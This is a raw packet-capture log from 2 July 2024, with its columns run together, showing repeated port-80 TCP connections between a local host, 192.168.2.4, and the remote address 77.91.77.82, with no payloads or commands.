                                            Jul 2, 2024 08:29:20.761080027 CEST6408880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:20.761168003 CEST806408977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:20.761248112 CEST6408980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:20.761354923 CEST6408980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:20.766117096 CEST806408977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:21.450776100 CEST806408977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:21.452174902 CEST6408980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:21.583039045 CEST6408980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:21.583802938 CEST6409080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:21.588419914 CEST806408977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:21.588473082 CEST6408980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:21.588686943 CEST806409077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:21.588757992 CEST6409080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:21.589483976 CEST6409080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:21.594762087 CEST806409077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:22.278203964 CEST806409077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:22.278264046 CEST6409080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:22.282495022 CEST6409080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:22.282881975 CEST6409180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:22.288237095 CEST806409077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:22.288286924 CEST6409080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:22.288522959 CEST806409177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:22.288642883 CEST6409180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:22.288702011 CEST6409180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:22.293858051 CEST806409177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:22.997581005 CEST806409177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:22.997981071 CEST6409180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:23.112020969 CEST6409180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:23.112344980 CEST6409280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:23.117357016 CEST806409277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:23.117372990 CEST806409177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:23.117897987 CEST6409280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:23.117963076 CEST6409180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:23.118176937 CEST6409280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:23.123174906 CEST806409277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:23.815790892 CEST806409277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:23.815851927 CEST6409280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:23.819324017 CEST6409280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:23.819662094 CEST6409380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:23.824537992 CEST806409377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:23.824611902 CEST6409380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:23.824743032 CEST806409277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:23.824790955 CEST6409280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:23.824950933 CEST6409380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:23.829669952 CEST806409377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:24.524533033 CEST806409377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:24.524904966 CEST6409380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:24.628004074 CEST6409380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:24.628004074 CEST6409480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:24.633801937 CEST806409377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:24.633816004 CEST806409477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:24.633897066 CEST6409380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:24.633897066 CEST6409480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:24.634164095 CEST6409480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:24.638968945 CEST806409477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:25.344432116 CEST806409477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:25.344589949 CEST6409480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:25.347516060 CEST6409480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:25.347517014 CEST6409580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:25.353737116 CEST806409577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:25.353879929 CEST6409580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:25.354001999 CEST6409580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:25.354166985 CEST806409477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:25.354266882 CEST6409480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:25.358881950 CEST806409577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:26.040997028 CEST806409577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:26.041053057 CEST6409580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:26.159941912 CEST6409580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:26.160337925 CEST6409680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:26.165112019 CEST806409577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:26.165220022 CEST6409580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:26.165252924 CEST806409677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:26.165318012 CEST6409680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:26.165569067 CEST6409680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:26.170480967 CEST806409677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:26.886199951 CEST806409677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:26.886312008 CEST6409680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:26.889142036 CEST6409680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:26.889162064 CEST6409780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:26.894334078 CEST806409777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:26.897182941 CEST806409677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:26.898188114 CEST6409680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:26.898204088 CEST6409780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:26.898447037 CEST6409780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:26.903229952 CEST806409777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:27.610472918 CEST806409777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:27.610532045 CEST6409780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:27.722637892 CEST6409780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:27.723108053 CEST6409880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:27.731777906 CEST806409877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:27.731868982 CEST6409880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:27.732279062 CEST6409880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:27.733468056 CEST806409777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:27.733630896 CEST6409780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:27.740760088 CEST806409877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:28.449893951 CEST806409877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:28.449980021 CEST6409880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:28.453849077 CEST6409880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:28.454313040 CEST6409980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:28.458859921 CEST806409877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:28.458939075 CEST6409880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:28.459031105 CEST806409977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:28.459098101 CEST6409980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:28.459353924 CEST6409980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:28.464099884 CEST806409977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:29.240335941 CEST806409977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:29.242187977 CEST6409980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:29.347327948 CEST6409980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:29.347414017 CEST6410080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:29.472407103 CEST806409977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:29.472546101 CEST806410077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:29.472618103 CEST6409980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:29.472735882 CEST6410080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:29.473001003 CEST6410080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:29.473587036 CEST806409977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:29.473658085 CEST6409980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:29.477803946 CEST806410077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:30.162611008 CEST806410077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:30.162733078 CEST6410080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:30.166280985 CEST6410080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:30.166716099 CEST6410180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:30.171412945 CEST806410077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:30.171457052 CEST6410080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:30.171500921 CEST806410177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:30.171570063 CEST6410180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:30.171813011 CEST6410180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:30.176609039 CEST806410177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:30.878856897 CEST806410177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:30.879014969 CEST6410180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:30.987723112 CEST6410180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:30.988074064 CEST6410280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:30.993364096 CEST806410277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:30.993391037 CEST806410177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:30.993472099 CEST6410280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:30.993472099 CEST6410180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:30.993841887 CEST6410280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:30.998859882 CEST806410277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:31.680820942 CEST806410277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:31.680887938 CEST6410280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:31.684402943 CEST6410280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:31.684779882 CEST6410380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:31.689485073 CEST806410277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:31.689536095 CEST6410280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:31.689771891 CEST806410377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:31.689837933 CEST6410380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:31.690140963 CEST6410380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:31.694941044 CEST806410377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:32.398413897 CEST806410377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:32.398504019 CEST6410380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:32.503505945 CEST6410380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:32.503981113 CEST6410480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:32.509016037 CEST806410477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:32.509092093 CEST6410480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:32.509221077 CEST806410377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:32.509269953 CEST6410380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:32.509356022 CEST6410480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:32.514628887 CEST806410477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:33.214627028 CEST806410477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:33.214781046 CEST6410480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:33.217432976 CEST6410480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:33.217768908 CEST6410580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:33.225719929 CEST806410477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:33.225903988 CEST6410480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:33.226844072 CEST806410577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:33.226960897 CEST6410580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:33.227088928 CEST6410580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:33.234128952 CEST806410577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:33.929831982 CEST806410577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:33.929900885 CEST6410580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:34.035240889 CEST6410580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:34.035667896 CEST6410680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:34.045387030 CEST806410677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:34.045403957 CEST806410577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:34.045485973 CEST6410580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:34.045567036 CEST6410680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:34.045855999 CEST6410680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:34.055126905 CEST806410677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:34.906532049 CEST806410677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:34.906639099 CEST6410680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:34.910056114 CEST6410680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:34.910065889 CEST6410780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:34.915199995 CEST806410777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:34.915215969 CEST806410677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:34.915304899 CEST6410680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:34.915347099 CEST6410780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:34.915795088 CEST6410780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:34.920692921 CEST806410777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:35.624542952 CEST806410777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:35.624672890 CEST6410780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:35.737802982 CEST6410780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:35.738204956 CEST6410880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:35.743015051 CEST806410777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:35.743071079 CEST6410780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:35.743155003 CEST806410877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:35.743215084 CEST6410880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:35.743340015 CEST6410880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:35.748877048 CEST806410877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:36.429775000 CEST806410877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:36.429837942 CEST6410880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:36.433343887 CEST6410880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:36.433824062 CEST6410980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:36.438652039 CEST806410977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:36.438733101 CEST6410980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:36.438824892 CEST806410877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:36.438877106 CEST6410880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:36.439058065 CEST6410980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:36.444807053 CEST806410977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:37.140367031 CEST806410977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:37.140938044 CEST6410980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:37.253428936 CEST6410980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:37.254152060 CEST6411080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:37.259356976 CEST806411077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:37.259628057 CEST6411080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:37.260070086 CEST6411080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:37.261137962 CEST806410977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:37.263236046 CEST6410980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:37.265400887 CEST806411077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:37.947035074 CEST806411077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:37.947102070 CEST6411080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:37.949980974 CEST6411080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:37.950314045 CEST6411280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:37.955092907 CEST806411077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:37.955141068 CEST6411080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:37.955212116 CEST806411277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:37.955280066 CEST6411280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:37.972104073 CEST6411280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:37.976948977 CEST806411277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:38.662587881 CEST806411277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:38.662813902 CEST6411280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:38.768872023 CEST6411280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:38.769295931 CEST6411380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:38.777120113 CEST806411277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:38.777147055 CEST806411377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:38.777235985 CEST6411280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:38.777239084 CEST6411380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:38.777590990 CEST6411380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:38.786173105 CEST806411377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:39.470627069 CEST806411377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:39.470763922 CEST6411380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:39.473663092 CEST6411380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:39.473663092 CEST6411480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:39.478610992 CEST806411477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:39.478996038 CEST806411377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:39.479091883 CEST6411380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:39.479091883 CEST6411480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:39.479340076 CEST6411480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:39.484546900 CEST806411477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:40.203723907 CEST806411477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:40.203793049 CEST6411480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:40.316859961 CEST6411480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:40.317239046 CEST6411580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:40.322544098 CEST806411477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:40.322706938 CEST6411480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:40.322886944 CEST806411577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:40.322947025 CEST6411580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:40.323261023 CEST6411580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:40.328542948 CEST806411577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:41.031230927 CEST806411577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:41.031502962 CEST6411580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:41.061436892 CEST6411580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:41.061815023 CEST6411680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:41.067346096 CEST806411677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:41.067477942 CEST806411577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:41.067569017 CEST6411580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:41.067569017 CEST6411680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:41.067861080 CEST6411680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:41.072901964 CEST806411677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:41.765556097 CEST806411677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:41.765619040 CEST6411680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:41.879875898 CEST6411680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:41.880270958 CEST6411780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:41.885016918 CEST806411677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:41.885049105 CEST806411777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:41.885066986 CEST6411680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:41.885113001 CEST6411780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:41.885277987 CEST6411780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:41.891174078 CEST806411777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:42.584956884 CEST806411777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:42.588156939 CEST6411780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:42.591306925 CEST6411780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:42.591306925 CEST6411880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:42.597079039 CEST806411777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:42.597093105 CEST806411877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:42.597346067 CEST6411780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:42.597346067 CEST6411880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:42.597654104 CEST6411880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:42.603344917 CEST806411877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:43.288223982 CEST806411877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:43.288479090 CEST6411880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:43.393865108 CEST6411880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:43.393867016 CEST6411980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:43.403551102 CEST806411977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:43.403831005 CEST806411877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:43.403922081 CEST6411880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:43.403928041 CEST6411980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:43.404186010 CEST6411980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:43.411159992 CEST806411977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:44.112965107 CEST806411977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:44.113035917 CEST6411980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:44.117257118 CEST6411980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:44.117625952 CEST6412080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:44.122581959 CEST806411977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:44.122639894 CEST6411980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:44.122834921 CEST806412077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:44.122899055 CEST6412080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:44.123203993 CEST6412080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:44.132285118 CEST806412077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:44.848203897 CEST806412077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:44.848277092 CEST6412080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:44.956938982 CEST6412080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:44.957448006 CEST6412180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:44.962060928 CEST806412077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:44.962275982 CEST6412080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:44.962302923 CEST806412177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:44.962378025 CEST6412180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:44.962599993 CEST6412180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:44.967363119 CEST806412177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:45.646811008 CEST806412177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:45.646867037 CEST6412180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:45.650357962 CEST6412180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:45.650727987 CEST6412280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:45.655603886 CEST806412277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:45.655664921 CEST6412280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:45.655891895 CEST6412280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:45.655972004 CEST806412177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:45.656023979 CEST6412180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:45.660742998 CEST806412277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:46.534554958 CEST806412277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:46.534621000 CEST6412280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:46.643682003 CEST6412380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:46.643685102 CEST6412280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:46.648564100 CEST806412377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:46.648905993 CEST806412277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:46.652115107 CEST6412280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:46.652116060 CEST6412380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:46.652337074 CEST6412380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:46.657079935 CEST806412377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:47.356208086 CEST806412377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:47.358701944 CEST6412380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:47.361721039 CEST6412380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:47.361725092 CEST6412480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:47.366513968 CEST806412477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:47.366769075 CEST806412377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:47.370528936 CEST6412480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:47.370529890 CEST6412380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:47.370798111 CEST6412480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:47.375612974 CEST806412477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:48.075730085 CEST806412477.91.77.82192.168.2.4
